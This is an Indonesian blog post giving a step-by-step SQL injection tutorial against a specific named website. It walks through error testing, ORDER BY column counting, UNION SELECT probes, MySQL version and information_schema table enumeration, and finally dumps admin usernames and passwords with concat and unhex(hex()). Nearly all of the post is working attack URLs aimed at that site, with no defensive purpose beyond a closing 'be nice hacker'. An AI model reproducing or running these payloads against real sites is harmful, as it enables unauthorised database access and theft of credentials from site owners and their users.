Blognya Triunt

Kerabat KOTAK Solo

SQL Injection Database Website

sql injection
Level : Pemula-Mahir
oke kali ini saya mo ngasih tutorial tentang sql injection
target = http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27
oke kita mulai aja

http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27 –> Normal page

kita test

http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27′ –> Error hehe

http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20order%20by%201/* –> test column

http://www.myesia.com/esia.php?id=2&page=newsdetail&news=27%20order%20by%2013/* –> column ke 13 error => berarti g ad

http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,4,5,6,7,8,9,10,11,12/* –> column yang terbuka 2 dan 4

test version mysql
http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,version(),5,6,7,8,9,10,11,12/* –> pake’ mysql versi 5 hehe bisa d schema ni

http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,table_name,5,6,7,8,9,10,11,12%20from%20information_schema.tables/* –> table dah muncul semua

ambil yang penting aja (admin)

http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,concat(username,0×3a,password),5,6,7,8,9,10,11,12%20from%20users/* –> gak mau d extrak ni oke deh

cara kedua unhex(hex())

http://www.myesia.com/esia.php?id=2&page=newsdetail&news=-27%20union%20all%20select%201,2,3,unhex(hex(concat(username,0×3a,password))),5,6,7,8,9,10,11,12%20from%20users/* –> username sama password udah ketemu

Selesai, be nice hacker bro….

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: